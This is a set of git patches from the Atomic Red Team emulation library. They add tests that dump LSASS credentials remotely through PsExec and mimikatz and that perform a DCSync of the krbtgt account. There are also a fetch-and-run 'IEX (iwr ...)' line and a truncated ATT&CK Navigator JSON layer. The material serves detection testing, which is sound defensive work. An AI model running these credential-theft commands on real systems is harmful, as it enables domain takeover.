mimikatz [windows] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e2c5f731..78395c09 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -223,6 +223,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) - Atomic Test #1: Reg Key Run [windows] - Atomic Test #2: Reg Key RunOnce [windows] @@ -478,6 +479,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 89005fa7..fd4ef41a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -5967,6 +5967,62 @@ privilege-escalation: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell + - name: Remote Process Injection in LSASS via mimikatz + auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + description: | + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). + It must be executed in the context of a user who is privileged on remote `machine`. + + The effect of `/inject` is explained in + supported_platforms: + - windows + input_arguments: + machine: + description: machine to target (via psexec) + type: string + default: DC1 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: 'PsExec tool from Sysinternals must exist on disk at specified + location (#{psexec_path}) + +' + prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + +' + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + executor: + command: '#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa + /inject /id:500" "exit" + +' + name: command_prompt + elevation_required: false T1055.008: technique: external_references: @@ -36768,6 +36824,62 @@ defense-evasion: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell + - name: Remote Process Injection in LSASS via mimikatz + auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + description: | + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). + It must be executed in the context of a user who is privileged on remote `machine`. + + The effect of `/inject` is explained in + supported_platforms: + - windows + input_arguments: + machine: + description: machine to target (via psexec) + type: string + default: DC1 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: 'PsExec tool from Sysinternals must exist on disk at specified + location (#{psexec_path}) + +' + prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + +' + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + executor: + command: '#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa + /inject /id:500" "exit" + +' + name: command_prompt + elevation_required: false T1055.008: technique: external_references: diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index dc781f76..f57dcfe4 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -12,6 +12,8 @@ More sophisticated samples may perform multiple process injections to segment mo - [Atomic Test #2 - Shellcode execution via VBA](#atomic-test-2---shellcode-execution-via-vba) +- [Atomic Test #3 - Remote Process Injection in LSASS via mimikatz](#atomic-test-3---remote-process-injection-in-lsass-via-mimikatz) +
@@ -105,4 +107,67 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th +
+
+ +## Atomic Test #3 - Remote Process Injection in LSASS via mimikatz +Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). +It must be executed in the context of a user who is privileged on remote `machine`. + +The effect of `/inject` is explained in + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| machine | machine to target (via psexec) | string | DC1| +| mimikatz_path | Mimikatz windows executable | path | %tmp%\mimikatz\x64\mimikatz.exe| +| psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) +##### Check Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" +Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force +New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null +Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force +``` +##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) +##### Check Prereq Commands: +```powershell +if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" +Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force +New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null +Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force +``` + + + +
From d5b6e69f895664e210f84f2dbf8f4e1e794a314e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Wed, 6 Jan 2021 19:46:59 +0100 Subject: [PATCH 046/131] T1003.006: add DCSync test (#1352) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Zakaria Addi Co-authored-by: Clément Notin Co-authored-by: Zakaria Addi --- atomics/T1003.006/T1003.006.yaml | 43 ++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 atomics/T1003.006/T1003.006.yaml diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml new file mode 100644 index 00000000..f7e13487 --- /dev/null +++ b/atomics/T1003.006/T1003.006.yaml @@ -0,0 +1,43 @@ +attack_technique: T1003.006 +display_name: "OS Credential Dumping: DCSync" +atomic_tests: +- name: DCSync + auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e + description: | + Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. + Works against a remote Windows Domain Controller using the replication protocol. + Privileges required: domain admin or domain controller account (by default), or any other account with required rights. + [Reference](https://adsecurity.org/?p=1729) + supported_platforms: + - windows + input_arguments: + domain: + description: Targeted domain + type: string + default: example.com + user: + description: Targeted user + type: string + default: krbtgt + mimikatz_path: + description: Mimikatz windows executable + type: path + default: '%tmp%\mimikatz\x64\mimikatz.exe' + dependency_executor_name: powershell + dependencies: + - description: | + Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + executor: + name: command_prompt + elevation_required: false + command: | + #{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" \ No newline at end of file From 9a59eac0b8975821354e6c5ee2934de0bb74c75a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 6 Jan 2021 18:47:22 +0000 Subject: [PATCH 047/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 0fa43020..e3b2d66c 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -645,3 +645,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 96f974bb-a0da-4d87-a744-ff33e73367e9 9726592a-dabc-4d4d-81cd-44070008b3af 3203ad24-168e-4bec-be36-f79b13ef8a83 +129efd28-8497-4c87-a1b0-73b9a870ca3e From 0b9d36e7865e148289d4047cec61af6289cb1c07 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 6 Jan 2021 18:47:31 +0000 Subject: [PATCH 048/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 45 ++++++++++++- atomics/T1003.006/T1003.006.md | 64 +++++++++++++++++++ 10 files changed, 118 insertions(+), 7 deletions(-) create mode 100644 atomics/T1003.006/T1003.006.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 788b3997..15536687 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniq